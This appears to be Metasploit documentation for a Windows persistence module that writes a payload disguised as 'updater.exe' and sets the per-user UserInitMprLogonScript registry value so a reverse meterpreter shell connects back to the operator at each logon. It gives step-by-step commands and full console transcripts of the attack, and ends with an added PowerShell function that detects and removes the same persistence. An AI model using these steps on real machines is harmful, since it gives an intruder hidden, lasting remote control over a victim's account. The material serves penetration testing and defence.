## Vulnerable Application

### Windows Persistence via HKCU UserInitMprLogonScript

This module establishes persistence by leveraging the per-user registry value:

`HKCU\Environment\UserInitMprLogonScript`

The module writes a payload executable to disk and sets the `UserInitMprLogonScript` value to that executable's path, so the payload is run by `userinit.exe` when the user next logs in.

Unlike the traditional `Winlogon\Userinit` (HKLM) technique, this method:

* Does not require administrative privileges
* Does not modify system-wide registry keys
* Only affects the current user
* Executes during interactive user logon

The payload will not run until the user signs out and logs back in, so a handler matching the payload, `LHOST` and `LPORT` the module was run with must be listening at that point.

## Verification Steps

1. Start `msfconsole`
2. Obtain a meterpreter session on a Windows target (user-level is sufficient)
3. `use exploit/windows/persistence/userinit_mpr_logon_script`
4. `set SESSION [session id]`
5. `set LHOST [listener IP]`
6. `set LPORT [listener port]`
7. `run`
8. Sign out from the Windows session
9. Log back in
10. A new meterpreter session should be created

## Options

### SESSION (Required)

The session to run this module on.

### LHOST (Required)

The local host to receive the reverse connection.

### LPORT (Required)

The local port to receive the reverse connection.

### PAYLOAD_NAME

The filename to use when writing the payload to disk. If not specified, a random filename will be generated. The `.exe` extension is appended by the module (`updater` becomes `updater.exe` in the scenario below).

### WRITABLEDIR

The directory the payload executable is written to (set to the user's `AppData\Roaming` directory in the scenario below).

### CleanUpRc

When set to `true`, the module writes a Meterpreter-compatible cleanup resource file under `~/.msf4/logs/persistence/`, as shown in the scenario below.

## Scenarios

### Initial Session

```
msf > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://172.21.176.212:4444
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Staging x64 payload (233052 bytes) ...
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: 7shkdu86) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 1 opened (172.21.176.212:4444 -> 172.21.176.1:62359) at 2026-03-01 05:45:19 +0200

meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information       Connection
  --  ----  ----                     -----------       ----------
  1         meterpreter x64/windows  NERO\DELL @ NERO  172.21.176.212:4444 -> 172.21.176.1:62359 (172.21.176.1)
```

### Install Persistence

The module starts its own handler for the payload it writes. In the run below that handler could not bind because port 4444 was still in use by the listener serving session 1; the payload file and the registry value were written anyway, the stale jobs were killed, and a fresh `multi/handler` was started with `run -j` so that a listener is up when the user logs back in. To avoid the bind failure, stop the earlier handler job first or give the module a different `LPORT`.

```
msf exploit(multi/handler) > use exploit/windows/persistence/userinit_mpr_logon_script
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/userinit_mpr_logon_script) > set SESSION 1
SESSION => 1
msf exploit(windows/persistence/userinit_mpr_logon_script) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(windows/persistence/userinit_mpr_logon_script) > set LPORT 4444
LPORT => 4444
msf exploit(windows/persistence/userinit_mpr_logon_script) > set PAYLOAD_NAME updater
PAYLOAD_NAME => updater
msf exploit(windows/persistence/userinit_mpr_logon_script) > set WRITABLEDIR C:\\Users\\DELL\\AppData\\Roaming
WRITABLEDIR => C:\Users\DELL\AppData\Roaming
msf exploit(windows/persistence/userinit_mpr_logon_script) > set CleanUpRc true
CleanUpRc => true
msf exploit(windows/persistence/userinit_mpr_logon_script) > set VERBOSE true
VERBOSE => true
msf exploit(windows/persistence/userinit_mpr_logon_script) > check
[+] The target is vulnerable. Registry path is writable
msf exploit(windows/persistence/userinit_mpr_logon_script) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

msf exploit(windows/persistence/userinit_mpr_logon_script) > [-] Handler failed to bind to 172.21.176.212:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Registry path is writable
[+] Writing payload to C:\Users\DELL\AppData\Roaming\updater.exe
[+] Configured HKCU\Environment\UserInitMprLogonScript to execute C:\Users\DELL\AppData\Roaming\updater.exe
[*] Meterpreter-compatible Cleanup RC file: /home/nayera/.msf4/logs/persistence/NERO_20260301.4724/NERO_20260301.4724.rc
jobs

Jobs
====

  Id  Name                                                    Payload                          Payload opts
  --  ----                                                    -------                          ------------
  0   Exploit: windows/persistence/userinit_mpr_logon_script  windows/meterpreter/reverse_tcp  tcp://172.21.176.212:4444 (setting up)

msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs

Jobs
====

  Id  Name                                                    Payload                          Payload opts
  --  ----                                                    -------                          ------------
  0   Exploit: windows/persistence/userinit_mpr_logon_script  windows/meterpreter/reverse_tcp  tcp://172.21.176.212:4444 (setting up)

msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs -K
Stopping all jobs...
msf exploit(windows/persistence/userinit_mpr_logon_script) > jobs

Jobs
====

No active jobs.

msf exploit(windows/persistence/userinit_mpr_logon_script) > use exploit/multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
msf exploit(multi/handler) > set LHOST 172.21.176.212
LHOST => 172.21.176.212
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

msf exploit(multi/handler) > [*] Started HTTPS reverse handler on https://172.21.176.212:4444
msf exploit(multi/handler) > jobs

Jobs
====

  Id  Name                    Payload                                Payload opts
  --  ----                    -------                                ------------
  1   Exploit: multi/handler  windows/x64/meterpreter/reverse_https  https://172.21.176.212:4444

msf exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NERO\DELL
meterpreter > sysinfo
Computer        : NERO
OS              : Windows 11 24H2+ (10.0 Build 26200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > reg queryval -k HKCU\\Environment -v UserInitMprLogonScript
Key: HKCU\Environment
Name: UserInitMprLogonScript
Type: REG_SZ
Data: C:\Users\DELL\AppData\Roaming\updater.exe
meterpreter > reg setval -k HKCU\\Environment -v testvalue -d test
Successfully set testvalue of REG_SZ.
meterpreter > reg deleteval -k HKCU\\Environment -v testvalue
Successfully deleted testvalue.
meterpreter > ls C:\\Users\\DELL\\AppData\\Roaming\\updater.exe
100777/rwxrwxrwx  7168  fil  2026-03-01 05:47:24 +0200  C:\Users\DELL\AppData\Roaming\updater.exe
meterpreter > background
[*] Backgrounding session 1...
msf exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information       Connection
  --  ----  ----                     -----------       ----------
  1         meterpreter x64/windows  NERO\DELL @ NERO  172.21.176.212:4444 -> 172.21.176.1:62359 (172.21.176.1)

msf exploit(multi/handler) > sessions -K
[*] Killing all sessions...
[*] 172.21.176.1 - Meterpreter session 1 closed.
msf exploit(multi/handler) > sessions

Active sessions
===============

No active sessions.

msf exploit(multi/handler) >
```

### Log out and log back in

```
msf exploit(multi/handler) > [!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
[*] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Attaching orphaned/stageless session...
[!] https://172.21.176.212:4444 handling request from 172.21.176.1; (UUID: bodrq2fe) Without a database connected that payload UUID tracking will not work!
[*] Meterpreter session 2 opened (172.21.176.212:4444 -> 172.21.176.1:65263) at 2026-02-28 07:58:07 +0200
```
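The registry value this module sets is also the artefact a defender (or an operator cleaning up without the RC file) looks for. The following PowerShell is an added example, not code from the Metasploit module or its documentation: it walks every loaded user hive under `HKEY_USERS` (the module only touches the current user's hive, but the same value can be set for any user), reports each `UserInitMprLogonScript` value together with the executable it points to and that file's SHA-256, and with `-Remove` deletes both the value and the file. The function and parameter names are this example's own; run it elevated to cover other logged-on users' hives.

```powershell
# Added example, not part of the module or its documentation: hunt for and
# optionally remove UserInitMprLogonScript persistence in every loaded user
# hive. Running elevated covers all logged-on users' hives under HKEY_USERS;
# unelevated it still covers the current user's own hive (the one this module
# writes to). Function and parameter names here are this example's own.

function Find-UserInitLogonScript {
    [CmdletBinding()]
    param(
        # Delete the value and the executable it points to instead of only reporting.
        [switch]$Remove
    )

    # One subkey per loaded hive, named by SID. The *_Classes subkeys are the
    # per-user HKCR view and never carry an Environment key, so skip them.
    $hives = Get-ChildItem -Path 'Registry::HKEY_USERS' |
        Where-Object { $_.PSChildName -notlike '*_Classes' }

    foreach ($hive in $hives) {
        $sid    = $hive.PSChildName
        $envKey = "Registry::HKEY_USERS\$sid\Environment"
        if (-not (Test-Path -Path $envKey)) { continue }

        $value = (Get-ItemProperty -Path $envKey -ErrorAction SilentlyContinue).UserInitMprLogonScript
        if ([string]::IsNullOrWhiteSpace($value)) { continue }

        # Resolve SID -> account where possible; a hive with no resolvable
        # account (e.g. .DEFAULT) is reported by its SID.
        try {
            $account = (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate([System.Security.Principal.NTAccount]).Value
        } catch {
            $account = $sid
        }

        # The value is a command line. Take the program token (quoted or not),
        # expand %VARS%, and check whether it is actually present on disk.
        $cmd = $value.Trim()
        $exe = ($cmd -split '\s+')[0].Trim('"')
        if ($cmd.StartsWith('"')) {
            $close = $cmd.IndexOf('"', 1)
            if ($close -gt 0) { $exe = $cmd.Substring(1, $close - 1) }
        }
        $exe    = [Environment]::ExpandEnvironmentVariables($exe)
        $onDisk = Test-Path -LiteralPath $exe -PathType Leaf
        $sha256 = if ($onDisk) { (Get-FileHash -LiteralPath $exe -Algorithm SHA256).Hash } else { $null }

        [PSCustomObject]@{
            Account     = $account
            Sid         = $sid
            LogonScript = $value
            Executable  = $exe
            OnDisk      = $onDisk
            SHA256      = $sha256
            Removed     = [bool]$Remove
        }

        if ($Remove) {
            Remove-ItemProperty -Path $envKey -Name 'UserInitMprLogonScript'
            if ($onDisk) { Remove-Item -LiteralPath $exe -Force }
        }
    }
}

# Report every hive that has the value set (no changes made):
Find-UserInitLogonScript | Format-List

# After reviewing the report, clear the value and delete the payload:
# Find-UserInitLogonScript -Remove
```

Against the scenario above, the report lists `NERO\DELL` with `C:\Users\DELL\AppData\Roaming\updater.exe` as the executable; only hives that are currently loaded appear, so a user who is not logged on has to be checked from their `NTUSER.DAT` separately.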